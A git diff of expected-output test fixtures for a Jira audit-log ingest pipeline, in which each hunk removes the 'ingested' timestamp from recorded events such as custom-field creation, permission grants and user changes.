 "original": "{\"timestamp\":\"2021-11-22T00:06:59.313Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10104\",\"id\":\"customfield_10104\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Original story points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Original story points\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5236,7 +5162,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924771544Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:59.266Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target end\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target end\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5310,7 +5235,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924772414Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:59.224Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target start\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target start\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5384,7 +5308,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.updated",
- "ingested": "2021-12-24T00:58:01.924773288Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:58.990Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5441,7 +5364,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924774160Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:58.974Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Parent Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Parent Link\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5510,7 +5432,6 @@
 },
 "event": {
 "action": "jira.auditing.customfield.created",
- "ingested": "2021-12-24T00:58:01.924775024Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:58.318Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10100\",\"id\":\"customfield_10100\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Team\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Team\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5579,7 +5500,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:01.924775911Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:57.162Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5653,7 +5573,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:01.924776778Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:57.158Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"Manage Sprints\",\"to\":\"\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"Project Role\",\"to\":\"\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"Administrators\",\"to\":\"\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5727,7 +5646,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:01.924777706Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:57.138Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -5802,7 +5720,6 @@
 },
 "event": {
 "action": "jira.auditing.user.added.to.group",
- "ingested": "2021-12-24T00:58:01.924778569Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:49.756Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "group",
@@ -5877,7 +5794,6 @@
 },
 "event": {
 "action": "jira.auditing.global.permission.added",
- "ingested": "2021-12-24T00:58:01.924779448Z",
 "original": "{\"timestamp\":\"2021-11-22T00:06:49.754Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -5951,7 +5867,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924781682Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.752Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6025,7 +5940,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924782586Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.751Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -6099,7 +6013,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924783456Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.750Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6174,7 +6087,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:01.924784404Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.734Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-administrators\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -6250,7 +6162,6 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-24T00:58:01.924785265Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.600Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Active / Inactive\",\"i18nKey\":\"admin.common.phrases.active.inactive\",\"to\":\"Active\"},{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"to\":\"test.user@example.com\"},{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"to\":\"Alex\"},{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -6344,7 +6255,6 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-24T00:58:01.924786175Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.596Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.system\",\"category\":\"system\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"action\":\"New license added\"},\"affectedObjects\":[{\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Date Purchased\",\"i18nKey\":\"admin.license.date.purchased\",\"to\":\"21/Nov/21\"},{\"key\":\"License Type\",\"i18nKey\":\"admin.license.type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"key\":\"Organization\",\"i18nKey\":\"admin.license.organisation\",\"to\":\"myself\"},{\"key\":\"Server ID\",\"i18nKey\":\"admin.server.id\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"key\":\"Support Entitlement Number (SEN)\",\"i18nKey\":\"admin.license.sen\",\"to\":\"SEN-L17782970\"},{\"key\":\"User Limit\",\"i18nKey\":\"admin.license.user.limit\",\"to\":\"Unlimited\"},{\"key\":\"jira-software\",\"i18nKey\":\"jira-software\",\"to\":\"-1\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -6437,7 +6347,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924787055Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.584Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6511,7 +6420,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924787930Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.583Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -6585,7 +6493,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924788861Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.581Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6659,7 +6566,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:01.924789753Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.579Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -6733,7 +6639,6 @@ }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-24T00:58:01.924790611Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.514Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -6799,7 +6704,6 @@ }, "event": { "action": "jira.auditing.user.renamed", - "ingested": "2021-12-24T00:58:01.924791474Z", "original": "{\"timestamp\":\"2021-11-28T18:18:26.076Z\",\"author\":{\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"from\":\"admin.user\",\"to\":\"admin.user1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -6870,7 +6774,6 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-24T00:58:01.924792341Z", "original": "{\"timestamp\":\"2021-11-28T18:23:20.278Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"from\":\"admin@example.com\",\"to\":\"admin1@example.com\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -6949,7 +6852,6 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-24T00:58:01.924793277Z", "original": "{\"timestamp\":\"2021-11-28T18:23:13.741Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"from\":\"Admin User\",\"to\":\"Admin User1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index c517829e254..9e89e02c7ef 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -25,7 +25,6 @@ }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-24T00:58:20.169927033Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"jira.auditing.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":514000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -91,7 +90,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169930493Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-software-users\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":579000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -167,7 +165,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169931384Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk 